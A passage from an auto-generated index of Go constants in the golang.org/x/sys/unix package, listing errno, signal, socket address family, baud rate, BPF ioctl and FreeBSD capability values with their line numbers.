| VCHECKPT = 0x13 constant VDISCARD (line 1423) | VDISCARD = 0xf constant VDSUSP (line 1424) | VDSUSP = 0xb constant VEOF (line 1425) | VEOF = 0x0 constant VEOL (line 1426) | VEOL = 0x1 constant VEOL2 (line 1427) | VEOL2 = 0x2 constant VERASE (line 1428) | VERASE = 0x3 constant VERASE2 (line 1429) | VERASE2 = 0x7 constant VINTR (line 1430) | VINTR = 0x8 constant VKILL (line 1431) | VKILL = 0x5 constant VLNEXT (line 1432) | VLNEXT = 0xe constant VMIN (line 1433) | VMIN = 0x10 constant VM_BCACHE_SIZE_MAX (line 1434) | VM_BCACHE_SIZE_MAX = 0x0 constant VM_SWZONE_SIZE_MAX (line 1435) | VM_SWZONE_SIZE_MAX = 0x4000000000 constant VQUIT (line 1436) | VQUIT = 0x9 constant VREPRINT (line 1437) | VREPRINT = 0x6 constant VSTART (line 1438) | VSTART = 0xc constant VSTATUS (line 1439) | VSTATUS = 0x12 constant VSTOP (line 1440) | VSTOP = 0xd constant VSUSP (line 1441) | VSUSP = 0xa constant VTIME (line 1442) | VTIME = 0x11 constant VWERASE (line 1443) | VWERASE = 0x4 constant WCONTINUED (line 1444) | WCONTINUED = 0x4 constant WCOREFLAG (line 1445) | WCOREFLAG = 0x80 constant WEXITED (line 1446) | WEXITED = 0x10 constant WLINUXCLONE (line 1447) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1448) | WNOHANG = 0x1 constant WNOWAIT (line 1449) | WNOWAIT = 0x8 constant WSTOPPED (line 1450) | WSTOPPED = 0x2 constant WTRAPPED (line 1451) | WTRAPPED = 0x20 constant WUNTRACED (line 1452) | WUNTRACED = 0x2 constant E2BIG (line 1457) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1458) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1459) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1460) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1461) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1462) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1463) | EALREADY = syscall.Errno(0x25) constant EASYNC (line 1464) | EASYNC = syscall.Errno(0x63) constant EAUTH (line 1465) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1466) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1467) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1468) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1469) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1470) | ECANCELED = syscall.Errno(0x55) constant ECHILD (line 1471) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1472) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1473) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1474) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1475) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1476) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1477) | EDOM = syscall.Errno(0x21) constant EDOOFUS (line 1478) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1479) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1480) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1481) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1482) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1483) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1484) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1485) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1486) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1487) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1488) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1489) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1490) | EINVAL = syscall.Errno(0x16) constant EIO (line 1491) | EIO = syscall.Errno(0x5) constant EISCONN (line 1492) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1493) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1494) | ELAST = syscall.Errno(0x63) constant ELOOP (line 1495) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1496) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1497) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1498) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1499) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1500) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1501) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1502) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1503) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1504) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1505) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1506) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1507) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1508) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1509) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1510) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1511) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1512) | ENOLINK = syscall.Errno(0x5b) constant ENOMEDIUM (line 1513) | ENOMEDIUM = syscall.Errno(0x5d) constant ENOMEM (line 1514) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1515) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1516) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1517) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1518) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1519) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1520) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1521) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1522) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTSOCK (line 1523) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1524) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1525) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1526) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1527) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1528) | EOVERFLOW = syscall.Errno(0x54) constant EPERM (line 1529) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1530) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1531) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1532) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1533) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1534) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1535) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1536) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1537) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1538) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1539) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1540) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1541) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1542) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1543) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1544) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1545) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1546) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1547) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1548) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1549) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1550) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1551) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1552) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1553) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1558) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1559) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1560) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1561) | SIGCHLD = syscall.Signal(0x14) constant SIGCKPT (line 1562) | SIGCKPT = syscall.Signal(0x21) constant SIGCKPTEXIT (line 1563) | SIGCKPTEXIT = syscall.Signal(0x22) constant SIGCONT (line 1564) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1565) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1566) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1567) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1568) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1569) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1570) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1571) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1572) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1573) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1574) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1575) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1576) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1577) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1578) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1579) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1580) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1581) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1582) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1583) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1584) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1585) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1586) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1587) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1588) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1589) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1590) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1591) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1592) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_freebsd_386.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x23 constant AF_ATM (line 16) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 17) | AF_BLUETOOTH = 0x24 constant AF_CCITT (line 18) | AF_CCITT = 0xa constant AF_CHAOS (line 19) | AF_CHAOS = 0x5 constant AF_CNT (line 20) | AF_CNT = 0x15 constant AF_COIP (line 21) | AF_COIP = 0x14 constant AF_DATAKIT (line 22) | AF_DATAKIT = 0x9 constant AF_DECnet (line 23) | AF_DECnet = 0xc constant AF_DLI (line 24) | AF_DLI = 0xd constant AF_E164 (line 25) | AF_E164 = 0x1a constant AF_ECMA (line 26) | AF_ECMA = 0x8 constant AF_HYLINK (line 27) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 28) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 29) | AF_IMPLINK = 0x3 constant AF_INET (line 30) | AF_INET = 0x2 constant AF_INET6 (line 31) | AF_INET6 = 0x1c constant AF_INET6_SDP (line 32) | AF_INET6_SDP = 0x2a constant AF_INET_SDP (line 33) | AF_INET_SDP = 0x28 constant AF_IPX (line 34) | AF_IPX = 0x17 constant AF_ISDN (line 35) | AF_ISDN = 0x1a constant AF_ISO (line 36) | AF_ISO = 0x7 constant AF_LAT (line 37) | AF_LAT = 0xe constant AF_LINK (line 38) | AF_LINK = 0x12 constant AF_LOCAL (line 39) | AF_LOCAL = 0x1 constant AF_MAX (line 40) | AF_MAX = 0x2a constant AF_NATM (line 41) | AF_NATM = 0x1d constant AF_NETBIOS (line 42) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 43) | AF_NETGRAPH = 0x20 constant AF_OSI (line 44) | AF_OSI = 0x7 constant AF_PUP (line 45) | AF_PUP = 0x4 constant AF_ROUTE (line 46) | AF_ROUTE = 0x11 constant AF_SCLUSTER (line 47) | AF_SCLUSTER = 0x22 constant AF_SIP (line 48) | AF_SIP = 0x18 constant AF_SLOW (line 49) | AF_SLOW = 0x21 constant AF_SNA (line 50) | AF_SNA = 0xb constant AF_UNIX (line 51) | AF_UNIX = 0x1 constant AF_UNSPEC (line 52) | AF_UNSPEC = 0x0 constant AF_VENDOR00 (line 53) | AF_VENDOR00 = 0x27 constant AF_VENDOR01 (line 54) | AF_VENDOR01 = 0x29 constant AF_VENDOR02 (line 55) | AF_VENDOR02 = 0x2b constant AF_VENDOR03 (line 56) | AF_VENDOR03 = 0x2d constant AF_VENDOR04 (line 57) | AF_VENDOR04 = 0x2f constant AF_VENDOR05 (line 58) | AF_VENDOR05 = 0x31 constant AF_VENDOR06 (line 59) | AF_VENDOR06 = 0x33 constant AF_VENDOR07 (line 60) | AF_VENDOR07 = 0x35 constant AF_VENDOR08 (line 61) | AF_VENDOR08 = 0x37 constant AF_VENDOR09 (line 62) | AF_VENDOR09 = 0x39 constant AF_VENDOR10 (line 63) | AF_VENDOR10 = 0x3b constant AF_VENDOR11 (line 64) | AF_VENDOR11 = 0x3d constant AF_VENDOR12 (line 65) | AF_VENDOR12 = 0x3f constant AF_VENDOR13 (line 66) | AF_VENDOR13 = 0x41 constant AF_VENDOR14 (line 67) | AF_VENDOR14 = 0x43 constant AF_VENDOR15 (line 68) | AF_VENDOR15 = 0x45 constant AF_VENDOR16 (line 69) | AF_VENDOR16 = 0x47 constant AF_VENDOR17 (line 70) | AF_VENDOR17 = 0x49 constant AF_VENDOR18 (line 71) | AF_VENDOR18 = 0x4b constant AF_VENDOR19 (line 72) | AF_VENDOR19 = 0x4d constant AF_VENDOR20 (line 73) | AF_VENDOR20 = 0x4f constant AF_VENDOR21 (line 74) | AF_VENDOR21 = 0x51 constant AF_VENDOR22 (line 75) | AF_VENDOR22 = 0x53 constant AF_VENDOR23 (line 76) | AF_VENDOR23 = 0x55 constant AF_VENDOR24 (line 77) | AF_VENDOR24 = 0x57 constant AF_VENDOR25 (line 78) | AF_VENDOR25 = 0x59 constant AF_VENDOR26 (line 79) | AF_VENDOR26 = 0x5b constant AF_VENDOR27 (line 80) | AF_VENDOR27 = 0x5d constant AF_VENDOR28 (line 81) | AF_VENDOR28 = 0x5f constant AF_VENDOR29 (line 82) | AF_VENDOR29 = 0x61 constant AF_VENDOR30 (line 83) | AF_VENDOR30 = 0x63 constant AF_VENDOR31 (line 84) | AF_VENDOR31 = 0x65 constant AF_VENDOR32 (line 85) | AF_VENDOR32 = 0x67 constant AF_VENDOR33 (line 86) | AF_VENDOR33 = 0x69 constant AF_VENDOR34 (line 87) | AF_VENDOR34 = 0x6b constant AF_VENDOR35 (line 88) | AF_VENDOR35 = 0x6d constant AF_VENDOR36 (line 89) | AF_VENDOR36 = 0x6f constant AF_VENDOR37 (line 90) | AF_VENDOR37 = 0x71 constant AF_VENDOR38 (line 91) | AF_VENDOR38 = 0x73 constant AF_VENDOR39 (line 92) | AF_VENDOR39 = 0x75 constant AF_VENDOR40 (line 93) | AF_VENDOR40 = 0x77 constant AF_VENDOR41 (line 94) | AF_VENDOR41 = 0x79 constant AF_VENDOR42 (line 95) | AF_VENDOR42 = 0x7b constant AF_VENDOR43 (line 96) | AF_VENDOR43 = 0x7d constant AF_VENDOR44 (line 97) | AF_VENDOR44 = 0x7f constant AF_VENDOR45 (line 98) | AF_VENDOR45 = 0x81 constant AF_VENDOR46 (line 99) | AF_VENDOR46 = 0x83 constant AF_VENDOR47 (line 100) | AF_VENDOR47 = 0x85 constant ALTWERASE (line 101) | ALTWERASE = 0x200 constant B0 (line 102) | B0 = 0x0 constant B110 (line 103) | B110 = 0x6e constant B115200 (line 104) | B115200 = 0x1c200 constant B1200 (line 105) | B1200 = 0x4b0 constant B134 (line 106) | B134 = 0x86 constant B14400 (line 107) | B14400 = 0x3840 constant B150 (line 108) | B150 = 0x96 constant B1800 (line 109) | B1800 = 0x708 constant B19200 (line 110) | B19200 = 0x4b00 constant B200 (line 111) | B200 = 0xc8 constant B230400 (line 112) | B230400 = 0x38400 constant B2400 (line 113) | B2400 = 0x960 constant B28800 (line 114) | B28800 = 0x7080 constant B300 (line 115) | B300 = 0x12c constant B38400 (line 116) | B38400 = 0x9600 constant B460800 (line 117) | B460800 = 0x70800 constant B4800 (line 118) | B4800 = 0x12c0 constant B50 (line 119) | B50 = 0x32 constant B57600 (line 120) | B57600 = 0xe100 constant B600 (line 121) | B600 = 0x258 constant B7200 (line 122) | B7200 = 0x1c20 constant B75 (line 123) | B75 = 0x4b constant B76800 (line 124) | B76800 = 0x12c00 constant B921600 (line 125) | B921600 = 0xe1000 constant B9600 (line 126) | B9600 = 0x2580 constant BIOCFEEDBACK (line 127) | BIOCFEEDBACK = 0x8004427c constant BIOCFLUSH (line 128) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 129) | BIOCGBLEN = 0x40044266 constant BIOCGDIRECTION (line 130) | BIOCGDIRECTION = 0x40044276 constant BIOCGDLT (line 131) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 132) | BIOCGDLTLIST = 0xc0084279 constant BIOCGETBUFMODE (line 133) | BIOCGETBUFMODE = 0x4004427d constant BIOCGETIF (line 134) | BIOCGETIF = 0x4020426b constant BIOCGETZMAX (line 135) | BIOCGETZMAX = 0x4004427f constant BIOCGHDRCMPLT (line 136) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 137) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 138) | BIOCGRTIMEOUT = 0x4008426e constant BIOCGSEESENT (line 139) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 140) | BIOCGSTATS = 0x4008426f constant BIOCGTSTAMP (line 141) | BIOCGTSTAMP = 0x40044283 constant BIOCIMMEDIATE (line 142) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 143) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 144) | BIOCPROMISC = 0x20004269 constant BIOCROTZBUF (line 145) | BIOCROTZBUF = 0x400c4280 constant BIOCSBLEN (line 146) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRECTION (line 147) | BIOCSDIRECTION = 0x80044277 constant BIOCSDLT (line 148) | BIOCSDLT = 0x80044278 constant BIOCSETBUFMODE (line 149) | BIOCSETBUFMODE = 0x8004427e constant BIOCSETF (line 150) | BIOCSETF = 0x80084267 constant BIOCSETFNR (line 151) | BIOCSETFNR = 0x80084282 constant BIOCSETIF (line 152) | BIOCSETIF = 0x8020426c constant BIOCSETVLANPCP (line 153) | BIOCSETVLANPCP = 0x80044285 constant BIOCSETWF (line 154) | BIOCSETWF = 0x8008427b constant BIOCSETZBUF (line 155) | BIOCSETZBUF = 0x800c4281 constant BIOCSHDRCMPLT (line 156) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 157) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 158) | BIOCSRTIMEOUT = 0x8008426d constant BIOCSSEESENT (line 159) | BIOCSSEESENT = 0x80044277 constant BIOCSTSTAMP (line 160) | BIOCSTSTAMP = 0x80044284 constant BIOCVERSION (line 161) | BIOCVERSION = 0x40044271 constant BPF_A (line 162) | BPF_A = 0x10 constant BPF_ABS (line 163) | BPF_ABS = 0x20 constant BPF_ADD (line 164) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 165) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 166) | BPF_ALU = 0x4 constant BPF_AND (line 167) | BPF_AND = 0x50 constant BPF_B (line 168) | BPF_B = 0x10 constant BPF_BUFMODE_BUFFER (line 169) | BPF_BUFMODE_BUFFER = 0x1 constant BPF_BUFMODE_ZBUF (line 170) | BPF_BUFMODE_ZBUF = 0x2 constant BPF_DIV (line 171) | BPF_DIV = 0x30 constant BPF_H (line 172) | BPF_H = 0x8 constant BPF_IMM (line 173) | BPF_IMM = 0x0 constant BPF_IND (line 174) | BPF_IND = 0x40 constant BPF_JA (line 175) | BPF_JA = 0x0 constant BPF_JEQ (line 176) | BPF_JEQ = 0x10 constant BPF_JGE (line 177) | BPF_JGE = 0x30 constant BPF_JGT (line 178) | BPF_JGT = 0x20 constant BPF_JMP (line 179) | BPF_JMP = 0x5 constant BPF_JSET (line 180) | BPF_JSET = 0x40 constant BPF_K (line 181) | BPF_K = 0x0 constant BPF_LD (line 182) | BPF_LD = 0x0 constant BPF_LDX (line 183) | BPF_LDX = 0x1 constant BPF_LEN (line 184) | BPF_LEN = 0x80 constant BPF_LSH (line 185) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 186) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 187) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 188) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 189) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 190) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 191) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 192) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 193) | BPF_MISC = 0x7 constant BPF_MOD (line 194) | BPF_MOD = 0x90 constant BPF_MSH (line 195) | BPF_MSH = 0xa0 constant BPF_MUL (line 196) | BPF_MUL = 0x20 constant BPF_NEG (line 197) | BPF_NEG = 0x80 constant BPF_OR (line 198) | BPF_OR = 0x40 constant BPF_RELEASE (line 199) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 200) | BPF_RET = 0x6 constant BPF_RSH (line 201) | BPF_RSH = 0x70 constant BPF_ST (line 202) | BPF_ST = 0x2 constant BPF_STX (line 203) | BPF_STX = 0x3 constant BPF_SUB (line 204) | BPF_SUB = 0x10 constant BPF_TAX (line 205) | BPF_TAX = 0x0 constant BPF_TXA (line 206) | BPF_TXA = 0x80 constant BPF_T_BINTIME (line 207) | BPF_T_BINTIME = 0x2 constant BPF_T_BINTIME_FAST (line 208) | BPF_T_BINTIME_FAST = 0x102 constant BPF_T_BINTIME_MONOTONIC (line 209) | BPF_T_BINTIME_MONOTONIC = 0x202 constant BPF_T_BINTIME_MONOTONIC_FAST (line 210) | BPF_T_BINTIME_MONOTONIC_FAST = 0x302 constant BPF_T_FAST (line 211) | BPF_T_FAST = 0x100 constant BPF_T_FLAG_MASK (line 212) | BPF_T_FLAG_MASK = 0x300 constant BPF_T_FORMAT_MASK (line 213) | BPF_T_FORMAT_MASK = 0x3 constant BPF_T_MICROTIME (line 214) | BPF_T_MICROTIME = 0x0 constant BPF_T_MICROTIME_FAST (line 215) | BPF_T_MICROTIME_FAST = 0x100 constant BPF_T_MICROTIME_MONOTONIC (line 216) | BPF_T_MICROTIME_MONOTONIC = 0x200 constant BPF_T_MICROTIME_MONOTONIC_FAST (line 217) | BPF_T_MICROTIME_MONOTONIC_FAST = 0x300 constant BPF_T_MONOTONIC (line 218) | BPF_T_MONOTONIC = 0x200 constant BPF_T_MONOTONIC_FAST (line 219) | BPF_T_MONOTONIC_FAST = 0x300 constant BPF_T_NANOTIME (line 220) | BPF_T_NANOTIME = 0x1 constant BPF_T_NANOTIME_FAST (line 221) | BPF_T_NANOTIME_FAST = 0x101 constant BPF_T_NANOTIME_MONOTONIC (line 222) | BPF_T_NANOTIME_MONOTONIC = 0x201 constant BPF_T_NANOTIME_MONOTONIC_FAST (line 223) | BPF_T_NANOTIME_MONOTONIC_FAST = 0x301 constant BPF_T_NONE (line 224) | BPF_T_NONE = 0x3 constant BPF_T_NORMAL (line 225) | BPF_T_NORMAL = 0x0 constant BPF_W (line 226) | BPF_W = 0x0 constant BPF_X (line 227) | BPF_X = 0x8 constant BPF_XOR (line 228) | BPF_XOR = 0xa0 constant BRKINT (line 229) | BRKINT = 0x2 constant CAP_ACCEPT (line 230) | CAP_ACCEPT = 0x200000020000000 constant CAP_ACL_CHECK (line 231) | CAP_ACL_CHECK = 0x400000000010000 constant CAP_ACL_DELETE (line 232) | CAP_ACL_DELETE = 0x400000000020000 constant CAP_ACL_GET (line 233) | CAP_ACL_GET = 0x400000000040000 constant CAP_ACL_SET (line 234) | CAP_ACL_SET = 0x400000000080000 constant CAP_ALL0 (line 235) | CAP_ALL0 = 0x20007ffffffffff constant CAP_ALL1 (line 236) | CAP_ALL1 = 0x4000000001fffff constant CAP_BIND (line 237) | CAP_BIND = 0x200000040000000 constant CAP_BINDAT (line 238) | CAP_BINDAT = 0x200008000000400 constant CAP_CHFLAGSAT (line 239) | CAP_CHFLAGSAT = 0x200000000001400 constant CAP_CONNECT (line 240) | CAP_CONNECT = 0x200000080000000 constant CAP_CONNECTAT (line 241) | CAP_CONNECTAT = 0x200010000000400 constant CAP_CREATE (line 242) | CAP_CREATE = 0x200000000000040 constant CAP_EVENT (line 243) | CAP_EVENT = 0x400000000000020 constant CAP_EXTATTR_DELETE (line 244) | CAP_EXTATTR_DELETE = 0x400000000001000 constant CAP_EXTATTR_GET (line 245) | CAP_EXTATTR_GET = 0x400000000002000 constant CAP_EXTATTR_LIST (line 246) | CAP_EXTATTR_LIST = 0x400000000004000 constant CAP_EXTATTR_SET (line 247) | CAP_EXTATTR_SET = 0x400000000008000 constant CAP_FCHDIR (line 248) | CAP_FCHDIR = 0x200000000000800 constant CAP_FCHFLAGS (line 249) | CAP_FCHFLAGS = 0x200000000001000 constant CAP_FCHMOD (line 250) | CAP_FCHMOD = 0x200000000002000 constant CAP_FCHMODAT (line 251) | CAP_FCHMODAT = 0x200000000002400 constant CAP_FCHOWN (line 252) | CAP_FCHOWN = 0x200000000004000 constant CAP_FCHOWNAT (line 253) | CAP_FCHOWNAT = 0x200000000004400 constant CAP_FCNTL (line 254) | CAP_FCNTL = 0x200000000008000 constant CAP_FCNTL_ALL (line 255) | CAP_FCNTL_ALL = 0x78 constant CAP_FCNTL_GETFL (line 256) | CAP_FCNTL_GETFL = 0x8 constant CAP_FCNTL_GETOWN (line 257) | CAP_FCNTL_GETOWN = 0x20 constant CAP_FCNTL_SETFL (line 258) | CAP_FCNTL_SETFL = 0x10 constant CAP_FCNTL_SETOWN (line 259) | CAP_FCNTL_SETOWN = 0x40 constant CAP_FEXECVE (line 260) | CAP_FEXECVE = 0x200000000000080 constant CAP_FLOCK (line 261) | CAP_FLOCK = 0x200000000010000 constant CAP_FPATHCONF (line 262) | CAP_FPATHCONF = 0x200000000020000 constant CAP_FSCK (line 263) | CAP_FSCK = 0x200000000040000 constant CAP_FSTAT (line 264) | CAP_FSTAT = 0x200000000080000 constant CAP_FSTATAT (line 265) | CAP_FSTATAT = 0x200000000080400 constant CAP_FSTATFS (line 266) | CAP_FSTATFS = 0x200000000100000 constant CAP_FSYNC (line 267) | CAP_FSYNC = 0x200000000000100 constant CAP_FTRUNCATE (line 268) | CAP_FTRUNCATE = 0x200000000000200 constant CAP_FUTIMES (line 269) | CAP_FUTIMES = 0x200000000200000 constant CAP_FUTIMESAT (line 270) | CAP_FUTIMESAT = 0x200000000200400 constant CAP_GETPEERNAME (line 271) | CAP_GETPEERNAME = 0x200000100000000 constant CAP_GETSOCKNAME (line 272) | CAP_GETSOCKNAME = 0x200000200000000 constant CAP_GETSOCKOPT (line 273) | CAP_GETSOCKOPT = 0x200000400000000 constant CAP_IOCTL (line 274) | CAP_IOCTL = 0x400000000000080 constant CAP_IOCTLS_ALL (line 275) | CAP_IOCTLS_ALL = 0x7fffffff constant CAP_KQUEUE (line 276) | CAP_KQUEUE = 0x400000000100040 constant CAP_KQUEUE_CHANGE (line 277) | CAP_KQUEUE_CHANGE = 0x400000000100000 constant CAP_KQUEUE_EVENT (line 278) | CAP_KQUEUE_EVENT = 0x400000000000040 constant CAP_LINKAT_SOURCE (line 279) | CAP_LINKAT_SOURCE = 0x200020000000400 constant CAP_LINKAT_TARGET (line 280) | CAP_LINKAT_TARGET = 0x200000000400400 constant CAP_LISTEN (line 281) | CAP_LISTEN = 0x200000800000000 constant CAP_LOOKUP (line 282) | CAP_LOOKUP = 0x200000000000400 constant CAP_MAC_GET (line 283) | CAP_MAC_GET = 0x400000000000001 constant CAP_MAC_SET (line 284) | CAP_MAC_SET = 0x400000000000002 constant CAP_MKDIRAT (line 285) | CAP_MKDIRAT = 0x200000000800400 constant CAP_MKFIFOAT (line 286) | CAP_MKFIFOAT = 0x200000001000400 constant CAP_MKNODAT (line 287) | CAP_MKNODAT = 0x200000002000400 constant CAP_MMAP (line 288) | CAP_MMAP = 0x200000000000010 constant CAP_MMAP_R (line 289) | CAP_MMAP_R = 0x20000000000001d constant CAP_MMAP_RW (line 290) | CAP_MMAP_RW = 0x20000000000001f constant CAP_MMAP_RWX (line 291) | CAP_MMAP_RWX = 